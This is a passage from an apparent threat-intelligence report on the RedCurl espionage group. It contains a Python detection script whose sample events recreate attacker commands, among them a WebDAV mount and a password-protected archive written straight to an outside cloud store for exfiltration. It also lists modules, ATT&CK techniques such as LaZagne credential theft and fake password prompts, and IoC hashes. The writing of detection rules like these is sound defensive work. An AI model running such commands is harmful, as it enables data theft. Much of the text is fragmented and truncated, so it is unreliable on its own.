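    # Channel2 mounting the operator's WebDAV store as a network drive
    r"net use https://storage.driveonweb.de/probdav S3cret! /user:op@example.invalid /persistent:no",
    # module output packed by the renamed 7-Zip console and written straight to WebDAV
    r"syspack.exe a -pPackPass -mhe=on -sdel -y \\app.koofr.net@SSL\dav\Koofr\STR\WS01_jdoe_info_[21987]_[1508]_1423.tmp C:\Users\jdoe\AppData\Local\Temp\log_1",
    # Channel2 starting a decrypted .bat through the hidden-window VBS wrapper
    r"wscript.exe C:\Users\jdoe\tempexec\run.vbs C:\Users\jdoe\tempexec\k3j9x2pa.bat",
    # a decrypted module started directly from the working directory
    r"cmd.exe /c C:\Users\jdoe\tempexec\a7f3k2m9.bat",
    # benign lines that must not fire
    r"net use Z: \\fileserver\share /persistent:yes",
    r'"C:\Program Files\7-Zip\7z.exe" a backup.7z C:\data',
]

# %computername%_%username%_%CMD_NAME%_[%random%]_[DDMM|MMDD]_HHMM.tmp
ARCHIVE_NAME_RE = re.compile(
    r"(?P<host>[^\s\\_]+)_(?P<user>[^\s\\_]+)_(?P<cmd>[^\s\\_]+)_"
    r"\[(?P<rand>\d{1,5})\]_\[(?P<daymonth>\d{4})\]_(?P<hm>\d{4})\.tmp\b",
    re.IGNORECASE,
)

RULES = [
    # WebDAV location mounted with 'net use' over HTTP(S) instead of a UNC share
    ("webdav_net_use", re.compile(r"\bnet(?:\.exe)?\s+use\b.*\bhttps?://", re.I)),
    # \\host@SSL\... is the WebDAV mini-redirector path syntax
    ("webdav_unc_path", re.compile(r"\\\\[\w.-]+@SSL\\", re.I)),
    # 7-Zip-style 'a' with a password and -sdel (delete sources after packing)
    ("7zip_password_sdel", re.compile(r"\b\w+\.exe\s+a\s+.*-p\S+.*-sdel\b", re.I)),
    # eight-character [0-9a-z] batch file inside a 'tempexec' directory
    ("tempexec_batch", re.compile(r"\\tempexec\\[a-z0-9]{8}\.bat\b", re.I)),
    # wscript/cscript running a .vbs that receives a .bat path as its argument
    ("vbs_batch_launcher", re.compile(r"\b[wc]script(?:\.exe)?\s+\S+\.vbs\s+\S+\.bat\b", re.I)),
]


def parse_archive_name(text):
    """Return the fields of the first template-shaped archive name in text, or None."""
    m = ARCHIVE_NAME_RE.search(text)
    if not m:
        return None
    fields = m.groupdict()
    fields["random"] = int(fields.pop("rand"))
    hm = fields.pop("hm")
    fields["hour"], fields["minute"] = hm[:2], hm[2:]
    # 'daymonth' is left as the raw four digits: the report notes the day/month
    # order depends on the host's date format, so it is not guessed here.
    return fields


def scan(events):
    """Return (rule_name, event_index) pairs for every rule that fires on each line."""
    hits = []
    for idx, line in enumerate(events):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((name, idx))
        if parse_archive_name(line):
            hits.append(("exfil_archive_name", idx))
    return hits


if __name__ == "__main__":
    for name, idx in scan(SAMPLE_EVENTS):
        print(f"{name:22s} -> {SAMPLE_EVENTS[idx][:70]}")
```

The rules are deliberately behavioural rather than tied to the two storage providers named in the report: a WebDAV mount by net use, a @SSL UNC target, a password-protected 7-Zip run that deletes its sources, and short random batch names under tempexec will survive a change of cloud account or provider.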
Modules were named based on the value of the %CMD_NAME%

 
 Collects information about the infected system
 Collects information from Active Directory
 Collects information about users in Active Directory
 Harvests credentials from the infected machine using LaZagne
 Collects logs from the infected machine. In some cases, it determines the contents of a directory located on the local network
 Collects a list of computers on the local network
 
 
 Obtains a list of available network drives at the address
 
 
 
 
 
 Removes traces of compromise from the infected machine
 Collects system information along with credentials
 
 Checks the internet connection
 
 
 
 Obtains a list of available resources for computers within the local network
cre Creates a fake window for entering the computer account password
 Same as the cre module
 
 
 
2 Alive
 
 Collects a list of directories on network drives that have write access
Attribution
RedCurl’s focus on espionage and the use of public cloud services may indicate that its campaigns are a continuation of the
RedOctober and CloudAtlas campaigns described by 
in the past (https://securelist.ru/cloud-atlas-stilnoe-vozvrashhenie-art-kampanii/24716/, https://securelist.com/recent-cloud-atlas-activity/92016/). These cyberespionage attacks targeted industrial, governmental, and commercial organizations in Russia, Central Asia, and Ukraine. They were carried out between 2010 and 2019. At the time of writing, there is no information about attacks involving CloudAtlas tools in 2020.
RedCurl, discovered by Group-IB experts, carried out attacks
-
est attack dates back to May 2018. Its victims included companies based in the UK, Canada, Norway, Germany, Russia, and Ukraine. All the companies were private and commercial.
As such, based on the geographical scope of attacks, it is impossi-

Lab.
-

by the strings in the section with resources. Moreover, Russian was

Figure 16. Language in the cloud web interface



  
 



Phishing document containing the following exploits:


Phishing document containing the following exploits:



Obtains information about the infected machine

Obtains a directory listing
Propagates across the compromised network
Sets up access to the compromised machine via SSH
Creates a phishing window with a form for entering domain account credentials
Keylogger
Takes screenshots

mobile devices
Extracts passwords using the LaZagne tool



Substitutes original documents on a network

Scans network computers for the MS08-067 vulnerability
LaZagne, 7-Zip
ADExplorer
NirCmd
SSH
curl
The RedOctober, CloudAtlas, and RedCurl campaigns all involved a modular Trojan. The C&C servers sent commands in separate modules. The RedOctober campaigns and early CloudAtlas attacks

like the RedCurl campaign. However, the tools used in RedCurl attacks are unprecedented and written in PowerShell. The latest CloudAtlas attacks also used a new PowerShell tool, which

reveal overlaps in the code with any RedCurl tools. LaZagne was used to retrieve passwords as part of all the campaigns. A detailed comparison between the campaigns based on the MITRE ATT&CK® matrix is presented below.

Procedure
T1566.002: Spearphishing link

to gain initial access to the target host.
T1204.002: Malicious File


T1059.003: Windows Command Shell - The cybercriminals used cmd.exe to execute batch scripts.
T1059.001: PowerShell - The cybercriminals used PowerShell scripts to perform post-exploitation tasks.
T1059.005:


T1053.005: Scheduled Task - The cybercriminals created tasks in the scheduler to achieve persistence on compromised systems.
T1547.001: Registry Run Keys / Startup Folder


persistence on compromised systems.
T1027: Obfuscated Files or Information - The cybercriminals encrypted data and Base64-encoded PowerShell commands.
T1036.005: Match Legitimate Name or Location - The cybercriminals masked their scripts and tasks in the scheduler using names similar to legitimate ones.
T1070.004: File Deletion - The cybercriminals removed batch scripts immediately after execution.
T1564.001: Hidden Files and Directories - The cybercriminals added the “hidden” attribute to malicious

T1218.011: Rundll32 - The cybercriminals used rundll32.exe to launch RedCurl.Dropper.


T1003.001: LSASS Memory - The cybercriminals used LaZagne to extract passwords from volatile memory.
T1555.003: Credentials from Web Browsers - The cybercriminals used LaZagne to extract passwords stored by web browsers.
T1552.001: Credentials in Files - The cybercriminals used LaZagne to extract passwords stored

T1552.002: Credentials in Registry - The cybercriminals used LaZagne to extract passwords stored in the registry.
T1056.002: GUI Input Capture - The cybercriminals used a phishing Microsoft Outlook pop-up to intercept login credentials.
Procedure
T1082: System Information Discovery - The cybercriminals regularly collected information about compromised systems.
T1035: Network Share Discovery - The cybercriminals collected information about network drives available to compromised hosts.
T1083: File and Directory Discovery

network drives.
T1087.001: Local Account - The cybercriminals collected information about local accounts.
T1087.002: Domain Account - The cybercriminals collected information about domain accounts.
T1087.003: Email Account - The cybercriminals collected information about email accounts.


T1080: Taint Shared Content

which allowed them to propagate across the network.
T1119: Automated Collection - The cybercriminals used batch scripts to collect data.
T1005: Data from Local System - The cybercriminals collected data from the local disks of compromised systems.
T1039: Data from Network Shared Drive - The cybercriminals collected data from network drives.
T1114.001: Local Email Collection - The cybercriminals collected emails.


T1102: Web Service - The cybercriminals used legitimate web services to download malicious batch scripts.
T1071.001: Web Protocols - The cybercriminals used the HTTP, HTTPS, and WebDav protocols to perform network connections.
T1020: Automated


T1537: Transfer Data to Cloud Account - The cybercriminals used cloud storage devices to copy data.


Procedure
T1566.001: Spearphishing Attachment - The cybercriminals used phishing emails with malicious attachments to gain initial access.
T1204.002: Malicious File - The device becomes infected as soon as the victim opens the malicious document.
T1059.001: PowerShell - The cybercriminals used PowerShell scripts during post-exploitation tasks.
T1059.005:


T1203: Exploitation for Client Execution


malicious code.
T1547.001: Registry Run Keys / Startup Folder


persistence on compromised systems.
T1027: Obfuscated Files or Information - The cybercriminals used AES and RC4 algorithms to encrypt the payload.
T1218.010: Regsvr32 - The cybercriminals used regsvr32.exe to launch malicious DLLs.
T1218.005: Mshta
execute malicious code.
T1221: Template Injection - The cybercriminals used malicious documents to download the payload from a remote server over HTTP.


T1003.001: LSASS Memory - The cybercriminals used LaZagne to extract passwords from volatile memory.
T1555.003: Credentials from Web Browsers - The cybercriminals used LaZagne to extract passwords stored by web browsers.
T1552.001: Credentials in Files - The cybercriminals used LaZagne to extract passwords stored

T1552.002: Credentials in Registry - The cybercriminals used LaZagne to extract passwords stored in the registry.
Procedure
T1082: System Information Discovery - The cybercriminals regularly collected information about compromised systems.
T1083: File and Directory Discovery

and network drives.
T1087.001: Local Account - The cybercriminals collected information about local accounts.
T1087.002: Domain Account - The cybercriminals collected information about domain accounts.
T1518: Software Discovery - The cybercriminals collected information about the software installed on the compromised hosts.
T1119: Automated Collection - The cybercriminals used batch scripts to collect data.
T1005: Data from Local System - The cybercriminals collected data from the local disks of the compromised systems.
T1039: Data from Network Shared Drive - The cybercriminals collected data from network drives.


T1102: Web Service - The cybercriminals used legitimate web services to download malicious batch scripts.
T1071.001: Web Protocols - The cybercriminals used the HTTP, HTTPS, and WebDav protocols to perform network connections.
T1573.001: Symmetric Cryptography - The cybercriminals used the AES algorithm to encrypt network connections.
T1090.003: Multi-hop Proxy - The cybercriminals used chains of compromised routers to communicate with cloud storage providers.
T1020: Automated


T1537: Transfer Data to Cloud Account - The cybercriminals used cloud storage devices to copy data.
The above comparative analysis of the RedCurl, CloudAtlas, and RedOctober campaigns shows that, despite similarities between the attacks, it is impossible to assert unequivocally whether RedCurl is a continuation of the
campaigns or linked to them in any way.
IoCs

  
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 571cba0332280827b067612f04f43f2b
SHA1: c2614da1b29293505fd71589641adfc5161a1146

acbca
Encoded
RedCurl.FSA
MD5: cc9460fa24872509eae5bd6496858202

SHA256: c9ad954dea815ef6fd7013b3ba2f476b65d13a9907dabc7ab3b13fee72c46ad6
Encoded
RedCurl.C1

SHA1: 6d488096fae4916dab8a17c43eb2ce8cee340616
SHA256: 3a962d97ca4fde28feae125d1460e25df33cfb47a6ddc60a2c12e0060244547e
Encoded
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 8292f62c1583a79021ad5e7654b33fd3
SHA1: d13feeac312e7a43340ef3ef6df28b4f53209016
SHA256: 4705ebee308ace8f17f333fb394eafa85893def238fc1383895c0bacffcda032
Encoded
RedCurl.FSA
  
MD5: 6a5eef605d8cfccf00f636ca7021e590
SHA1: b5922c93e70840125617ba36a3651413c641e558
SHA256: 402d12e5ec939db389bf5713af5c90b25fc2f1ba7f653ec9454140f32fca2f7b
Encoded
RedCurl.C1

SHA1: dd4392b4c06a24b615d7672a90d4c0bf43425efe

c92d
Encoded
RedCurl.C2
MD5: 5f6d12a1f6a58f0abab1e214c5fcc872
SHA1: 126fb5c821e4d9e3cd22fb4076c718e6c7048537
SHA256: 125b81f93be005d9709af4c95bc4b4449aeb3c2af36730c3441a267444cfa8cd
Encoded
RedCurl.FSA
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 6272b59b5090f45639a5a26ad8f98365
SHA1: fc6d0882cafc128ea44dfb82a8612c28246457ba
SHA256: 55327d92ee6f11faec64a6dc9a5088940458610b05671a766a4874b32ca30035
Encoded
RedCurl.FSA
MD5: 9691daebab79c6ab48adac73bda0a84a
SHA1: 4d068039476fe2e5a883d08d3b16827ab2442a1f
SHA256: af4983c6a86105d1b7f1c73e1ce7ea4710d5f5c7dbdf14d87132279346dad96f
RedCurl.InitialDropper

SHA1: d80dea264dc6621223b3f91564c71699f4d20d6b
SHA256: 8353529d98b32d45a403128f03a3e8f6cc21f9dfb9362b9898eb0e4dc3bd807f
RedCurl.FSA_light
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 2375e40fb45efecc4e162449ea1fb479
SHA1: a7a170ea16b4fb567da7656f9690977129bf022b
SHA256: abb51a52a9bb5342ed2f1acb9f4c802d7333f8f493b2970dc9767e5bc608514a
RedCurl.Dropper
MD5: 2abdcca9bdfa79e22f49af21082422f1
SHA1: 9921aaba1bc6ac7c2002db7b395d2d6fce232b05
SHA256: 684f231c7ec0fde283d559cad729acdadcda8644b8054a40bda2f078ed777e79
Encrypted
RedCurl.FSA
MD5: aa57b416608949c5dcf9f496832f317e
SHA1: 6e4a0fc3b901a1eb2d7dad87e08bbe8176df27ca
SHA256: fe03a9a0a2df2e8580a990b7dbd7e6915e1bd56a3716cdc686b39a973ac945b7
Encrypted
RedCurl.C1
  
MD5: 5294c19eea035302410711b718cd623e
SHA1: a32edf29e9dd334d938e7d43bf5f23e5e2e1379b
SHA256: 14c02e489f2593f5a4f13dba6ea4675e4fe233081a90fa2deeb1e7afcc5b7cfb
Encrypted
RedCurl.C2
MD5: e18e269de42033065baeaf3e1bba0cf7
SHA1: 2bc166ae7482ab1fc164a82333d52f562e3ebcf2
SHA256: ba7278b2d7087d2cdd0af9ca298edbab5e134d31ac33da7378c28032b2894b69
RedCurl.Dropper
MD5: aa625ac2df396bb478eee6a875083dc6
SHA1: 1e799d277564f5e2dc02765d67baa2b001eb3c14
SHA256: 9bfda16318e0a1875f2c527196e6ecec8b818663bbfd26b40ae2c310aa234834
Encrypted
RedCurl.FSA
MD5: fd3f1940afc2b429bc56c0b55f356944
SHA1: 9544021eca90f2b61c00b1f3d964eada46c4069f
SHA256: dac83995f978a8917bca8577ddcbb43efdb9889db82d112dd547e0d52d277866
Encrypted
RedCurl.C1
MD5: 8048a791b5946dd68a1fc8ca5358ec75
SHA1: 0536f010e53e68844875d635b9af896b98b7b7f9

421b
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 40ef07b3221d9846d892c42d10b7220e
SHA1: e8c2b3f99fccd983fb8245d9523687e6f3d9e7c0

9d184f
RedCurl.Dropper
MD5: f215b71695e8f5f4ddf50466e853cc42
SHA1: 37bd8f99b48d3c4ba2d961a2845500d49f6d0b67
SHA256: d8e25f8abb73f4c14c80d65fcb26cefca276ddbf184145be5dca2ed553c784b2
Encrypted
RedCurl.FSA
MD5: 313ede2578a6d8ab5a1b558a78759085
SHA1: eab481f339cd5f64bc91c7718ccdc7997bb717d6
SHA256: c12e73c1422138b496c4632115a69acfad3a3603979bf78f6f54ed7a2dace22b
Encrypted
RedCurl.C1
MD5: 3becc75bfd9c8d3fd19b8486ba980ce4

SHA256: 20bde46e621f2c18402d9f32ea8021525b8f0af27977210c0fde74c6c0117d36
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
  
MD5: b096449ed0ca654ae166bc141bd22335
SHA1: c9f2ed153f54faab782fde4d7b99b8a76165b43b

0641e1
RedCurl.Dropper
MD5: da62ada98b1b0c6ecb5d47eab1e9519e
SHA1: 3e8594a9ae1b779502dad2783a32be3708121ee6
SHA256: 67ac0312de78b8f3d8cb3202cf109a19593407cba10d53d24e21750b77463b7a
Encrypted
RedCurl.FSA
MD5: b1479513a24a37e4e3b0c38d6535cf21
SHA1: 6a3132c2d2663c70cbf91c3b6e412de6a9b2000f
SHA256: 9f73b30c0c8fca4950ac7de0497fec3104fb747df07550125987e546ec

Encrypted
RedCurl.C1
MD5: b2e91b4b714adbe826dbb5692db78453
SHA1: 8a7dc93cb358dfa3ede7ebe6215200541a5d2350
SHA256: 0ab7a99db824bc6435f6c0b9b8228398e50c572620f40e392e4afdf163133274
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 98e9ab41cc8756fb15edaf879200d414
SHA1: 18f5abb55e372c59d35665b125a3facd39406d0a
SHA256: 47ea69945bbeb18bce1c0446f00cc6b2ed29836238a8c76b1078fc4f6e2a08d2
RedCurl.Dropper
MD5: 484bb302a2ca940f562be418e1b67eee
SHA1: 1d4b869153121c47b97901dfe9b0a595d3a41b65
SHA256: 3cae215d0fb22e64034a7c5364a5498d31a8409ec46621809855c057c88c6f91
Encrypted
RedCurl.FSA
MD5: 948ccaba625e5073730cef8c0d21f894
SHA1: a31c0046f06c9274adc322363045b7a6e01ccc9e

873638d
Encrypted
RedCurl.C1
MD5: edab30e2d72f62f9056398e85d31195d
SHA1: af8e1aa9e57b2dae655b6b2a0c3b3ec15878a57d
SHA256: 1c1608cb2e48e68cd961994484de3aed68b35b1c5f118040f0336a5eba9d50af
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
  
MD5: dcf33e6f22ed5a24fb8e2c507770f278

SHA256: 82e21853c392a31ec1751e58bd98abb50ecfb19afc7d6bb6e9e4f0cc4538eda5
RedCurl.Dropper
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 3E36E2AF206B6C41847161C58C777554
SHA1: 679A71094CD62D342CFD189F178E7D8CDDC5D0C1
SHA256: 6EA64629B17DA6923AD58680CE769B545E9A75E3FC7B86CB9756B1D3E85D7A2D
RedCurl.Dropper
MD5: f2fe7442b9017dcfe146ebea85a631e7
SHA1: a608509665e6f07e407c636fdafc9a364df9ba89
SHA256: 0f3e14d24ef31e6acdd491a5406818a4526741e04d080b6c2d28547ec9fb42d5
Encrypted
RedCurl.FSA
MD5: 8734bfe951847a5b577f01088c5cc803
SHA1: 6ed0375d527cc8855f435777f68d4924cf24957b
SHA256: fe1dbf4420d247b7e55b9a313b83d7ec9833efa1e1c7d169aeeb7a5ef32c8c09
Encrypted
RedCurl.C1
MD5: 2c100f7835627ab7acb5cb58dfd04b8d


62ed6
Encrypted
RedCurl.C2

SHA1: 08d429f8ba3218b9442f6c00d33988fe8d924cab

5edf376904
RedCurl.Dropper
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 973579883D19696C3B4286E74D8FA062
SHA1: 3580DD6B213C6EFB86F6DFCD9A39EF850C47E503
SHA256: 4DCB6F2DC401095B730FCFA50098E05C407C1AF2376AC2483EE1D813D6524CBE
RedCurl.Dropper

SHA1: b3dea7c6d31b4e1acf07befe2b937e545faa1172
SHA256: 65c95bbd3cd3bd6b7bdbd05394a4cdb7fee2b2d43953bfbf23bf5fbd29412736
Encrypted
RedCurl.FSA

SHA1: 276b97c5805d932e19b5156e93d3054ca2403c58
SHA256: 9ea46aa8cc4c26000b83ef445e296938fd81f2a322f7cde8a0220b4f20c0d973
Encrypted
RedCurl.C1
  
MD5: 8b16f157d0f07819ada6896fed86d5d3

SHA256: 90583fa223fb3c5a86169e0f672266bbda3ddc8a4cc59662f58be00b313b0c72
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: dcc0098c95e58a6bf95f0cfe70a4f476
SHA1: 5e950dc125984ce19136d99dd87baaf943c3a8b7
SHA256: 86b4e9a8a20ee49ae49df514ad768b12d4ebb042bb749eee19e6736a68554bac
RedCurl.Dropper
MD5: 78965056e42a035de01a7fc420d9bb97
SHA1: e66f165ddb1c6bbf2e5c524e3ba6715dce0d0290
SHA256: d3ea43eccbd1224b871d60c16b6ae0f67907c16fb8e81d14a494c96b615a6373
Encrypted
RedCurl.FSA
MD5: 5e29db24d44311463fdeea35aa6cd61c
SHA1: b359138e5a02a4ccdbb3526aa5351e44ee175352
SHA256: c9b17f5f1a7e8513c1f1458989003f9bc126bbb1a1bb6ddace870500329a5a56
Encrypted
RedCurl.C1
MD5: b2ac2fad617b22f11b19bd24c50c4e8c
SHA1: 3e684d2e3043c57b960343319c094ef7318bea5f
SHA256: 71382a330a393b50d5a873f37fafb6ebad274d4aee006fcb321f1c8db1fe4fc3
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 78965056e42a035de01a7fc420d9bb97
SHA1: e66f165ddb1c6bbf2e5c524e3ba6715dce0d0290
SHA256: d3ea43eccbd1224b871d60c16b6ae0f67907c16fb8e81d14a494c96b615a6373
Encrypted
RedCurl.FSA
MD5: 5e29db24d44311463fdeea35aa6cd61c
SHA1: b359138e5a02a4ccdbb3526aa5351e44ee175352
SHA256: c9b17f5f1a7e8513c1f1458989003f9bc126bbb1a1bb6ddace870500329a5a56
Encrypted
RedCurl.C1
MD5: b2ac2fad617b22f11b19bd24c50c4e8c
SHA1: 3e684d2e3043c57b960343319c094ef7318bea5f
SHA256: 71382a330a393b50d5a873f37fafb6ebad274d4aee006fcb321f1c8db1fe4fc3
Encrypted
RedCurl.C2
  
MD5: e2d981da14863ab47345eb8534c8e3a1
SHA1: 5bea907808d30369f60e7902a1b4906ded699897
SHA256: 18e43031ee4ed50a773780e32e354ae5222988f675e3d51a1329df4f84d61578
RedCurl.Dropper
MD5: e315ea0ad5aa2556e4b0f68afe989acc
SHA1: 3606849f0d6ec485579a8c6c136707e6c85ec473
SHA256: 57441a44625855340c0bfdf1b6f5e69a520e4e3041064e3322b219a1b73cbbc2
Encrypted
RedCurl.FSA
MD5: 04055917ce47645427b4f4ca84fe1e51
SHA1: 21f23c97bb3d008baf5b276a847ede51efef8cc3
SHA256: e75d03e6db53644e9d24838dd1c70d9f8687661fc850e6154dcd66ebb0671333
Encrypted
RedCurl.C1
MD5: dc8544751117ef6c0d320fbcd9e4a2db
SHA1: f2e3d9700b0303cc1f57a7802b36420e79b25ce6
SHA256: cd2f32ed533d4edba9874736f8eb3431042ec5af0674740b83c93af623f5b0b8
Encrypted
RedCurl.C2
MD5: e7d27d0d682d8bb56b29b34e3eda03d7
SHA1: ef8b6293111eb3fd2244307d95e8278b31778a78
SHA256: c7df2c96c74e712cb3d33264f0f80140471b281c6fa7bbad313b74da048d828a
RedCurl.Dropper
MD5: f2e33472eb55f22a5c1eb1dd2dfdca8c
SHA1: 1e82f8862e2d0884d20fbcd96d9d751c5924403e

ccdc
Encrypted
RedCurl.FSA
MD5: acb1882549b7556259bf7f25c7fbf077
SHA1: aad0f1ce8cae3b0dd12f5a70f1ef495fd7269a1a
SHA256: 9d405df68f1f017be0743a4db478d266b11cb804b4a6f5219f1caa67fe866a78
Encrypted
RedCurl.C1
MD5: 7c0ec47f4b6acb597954b8f6befe33f1
SHA1: 1644b15cdda74505f5a06ccbe1c5615db11f2558

5225ba3
Encrypted
RedCurl.C2
MD5: 0bd8e164a95532bb2817bf2e056cc0f1
SHA1: 403f8b0f9bb5e8a80651743ab274c63fa930c3bf
SHA256: 3e143dfbc61ca565569cb5d997588da702f5b2a7293902695cab52374cb4c7bf
RedCurl.Dropper

SHA1: 1eb09787262722d8684db5c008066c9b69b15b94
SHA256: 1d5a6fbc0514ae637cafd327aead8c01e000a8d9c80bd0be8faa21217b9ec412
Encrypted
RedCurl.FSA
MD5: 774e762e8546c569328a1d550cd9479e
SHA1: 0e8fe9dcfd88c89632f813227ecd9299455bec86
SHA256: b4c8079dbe2a1b3d04f9656df1d47eaeecf3dbc4cb8eceaf71a8fbba547cd2df
Encrypted
RedCurl.C1
  
MD5: 313a8aad53478e141011934a3ead2ed6
SHA1: f47a3e557813139b0202bb7e1bef7d1e5564f3d6
SHA256: f5958605365175b6eb9da3544778b8e100cbebb3d2e1f9788d25df71d5394d2d
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********

SHA1: 3c34b35c9bf5e73cb702d6c2f7cbd96d2ee2f5cd
SHA256: e77c4990b3863e789efc1b064a8387e7c71e74bc5f960045f64b5b1dadbfc213
RedCurl.Dropper
MD5: e3ac036fe4ac10813914b1cca52d1de5
SHA1: 8711b71fda59b5b75176b436d2498d57c59d1389
SHA256: b0b9fb1aaabf4a45e9f8dada75e7fee04aa61ead9432340bb9c5f92161a6372d
Encrypted
RedCurl.FSA
MD5: 36fb611a076da404f61ef667a12cac55
SHA1: 36de37b3117e1f8e9df4749b2de886aef968511f
SHA256: 3a4ab011bb5c5c24852ab21abe635f2969ac9452e354d22da1cbb793b63c3278
Encrypted
RedCurl.C1
MD5: 868d9d2bd0d11843e5a381b1873508cb
SHA1: b0eb8d3d80e503708a19a891b5ba11a9b55e54f6
SHA256: b24955832b9fb277166535531773f52374f54bb7d6645687e4e03d0cea460f6d
Encrypted
RedCurl.C2
MD5: fe8dceacfbf2dc4d874359ef6fca2de1


a518ca
RedCurl.Dropper
MD5: 25f4359b5201295ac56dcf234800a3d9
SHA1: 11c62b38f40faa6961be9ec2df8af1344c672233
SHA256: 88caafdca263af4b7f6d6b952b16093b059cbcdb13ef26eabf096659dcb96e48
Encrypted
RedCurl.FSA
MD5: e31512cb72b081f51e214f7d2496c0e1
SHA1: 3a4ba61af6cbc627dd450ed74e58cdec3aee076d

c4a6d83e
Encrypted
RedCurl.C1

SHA1: 46e50da34773d0960dbedfb4598762b233725bbd
SHA256: 4bd0943312cbf137da2286efd6e1892235d0cafe2b7472509c80cf5a2

Encrypted
RedCurl.C2
  
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 5f49e06a5a03f67eb476b66ab461f116
SHA1: 0d0938ce0b6a2150ba3e02d231b9dafd5aeea69f
SHA256: 4bef36d87e4a7f3e0f4fedacedb0f914c173e28718a413106de9972e2e29cebf
RedCurl.Dropper
MD5: e2ce59cd2a36a5dfa2bc3ab8a8d9eca8
SHA1: 25ec727de33683062e1e4afa11269fcaf61ea2b9

7459c4
Encrypted
RedCurl.FSA
MD5: 73340f09829b923c5a8c3468e166e49d
SHA1: 2991873bd471a288379b2ddc3d03fa9a415e0eac
SHA256: 2c10d7a916fddae6baaece992a1a12e2c76fa9da82e322b68aadd31c85dd48c7
Encrypted
RedCurl.C1
MD5: c45df36255f57e31aeabd723e03bbd08
SHA1: 4cb87f3d29b83620c96b67e4531120063438af01
SHA256: 5aab509c14e9a6a63c4ca318d681be252bc406018d50f0b7b204bfbb63d73652
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 5e694e86bf0bc3e55f5a65d6684e1631
SHA1: c47522b3923173881f52dddacd48acd88359f23a

2cce
RedCurl.Dropper
MD5: 2a5365dc4344c258196dfdba5d783db0
SHA1: 0782da50a5ddf8551adc5957896a0406abc8ad16
SHA256: d90d3d5c18bb8b9ba31be1a82fdbc7df4d37e7d05873e18843229e27b0501991
Encrypted
RedCurl.FSA
MD5: 2d484bd4ea9e4d3853f0e91e062d980b

SHA256: 7c99c0a7882da8d88c175ce4a34d2cac80bcdb7a2fa5f3815b01885546b9e205
Encrypted
RedCurl.C1
44
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
  
 MD5: a1fa93c9650044ed71bbda18bdfe5f61


598af
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: c47104f9c669454e7b48d2c717d949da
SHA1: edfc60a54fda49fa43a6e0d8ed5a14e181278617

c2ad43
RedCurl.Dropper
MD5: 808f2e36caaa5c2e88c29cf0e634e2bb
SHA1: 84051063cf4e11cef9ec8c3ce81d4a2a4b36348f

466c5
Encrypted
RedCurl.FSA
MD5: 1c3a60db0b174963dd01953c55804411
SHA1: ccc8176dd2cc0d7831d153f9d9399b4712e6da5b

9f86aa
Encrypted
RedCurl.C1
MD5: 04a1c0704b549581e3029634ea2ecf07
SHA1: 6343000188465aa07d92639f812f7fccf0ed56cf
SHA256: 95d95e0df11486a4ac675dadad541848435327a1f9eed331bba808179
821d740
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 47db515e537b88184f450bd352cb7e6e
SHA1: d9d6001515073a6fda28958f5990091733662e17

1ebe1
RedCurl.Dropper

SHA1: 2dd90d341d80edef4fbee339c856caec3001056f
SHA256: e29ccda7507adc5479d4413c9486b2217b4c2e415be5f03259540359
d7b2c6aa
Encrypted
RedCurl.FSA
MD5: 24b5427d7e147de61d6b2b535aa1028f

SHA256: cfabe2d5bee9367fd7a8a6882c3ab0fbd897520e44ce67cc40d60b02
f8f19d04
Encrypted
RedCurl.C1
MD5: a3d0c95a34ebf46b313c26ea7ca79288
SHA1: 7bef4606d73bd77b8d1d5b6b7a08f8869190d49d
SHA256: f66c8d0fdc5d436a5c284d36d36cfe3cc7e1f7efcca5a7274a58bf1cd5f
fd4b8
Encrypted
RedCurl.C2
45
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
  
 MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 95a5fba13ae88e43f460c9fba7328670
SHA1: 47dc335be7c9c114c6061fd72b8b76cf87e63e72
SHA256: 10558d1be5fcaf108240ebe1f8a53ecb0c4acc82e7f3ab6885b00dc102
9b7fcf
Encrypted
RedCurl.FSA

SHA1: 2f7581666f5a7ccc6afa3a1ac7cc1994f78a7ae2
SHA256: 4f984cf3589903887f0b221b1db5ef7c47e7bce9568a5a8070aea8f42f
b31fe9
Encrypted
RedCurl.C1
MD5: d3de39a4482cfa3f051f418a10e1994e
SHA1: 91210c365e4ceaaef5aeb595f30c53d573a27943
SHA256: d4a7943abb06b42b731c22bb8fd5c49fb714dcac11cbeca1e81c5781f62

Encrypted
RedCurl.C2
 MD5: 082f4383801b79279e82b718c672a452
SHA1: ce178c77370e9654c810c5a67fa55d2e0bd0a7f4
SHA256: 24b6308438b081c77338a917b907d57a3f5519b6008167e6c1b3d9d02
cd4a38a
Encrypted
RedCurl.FSA
MD5: a75871000b944b87fa0aee37cb20facf
SHA1: c25194f9c547a85a9ce7a7dd752427b33a16c0e7
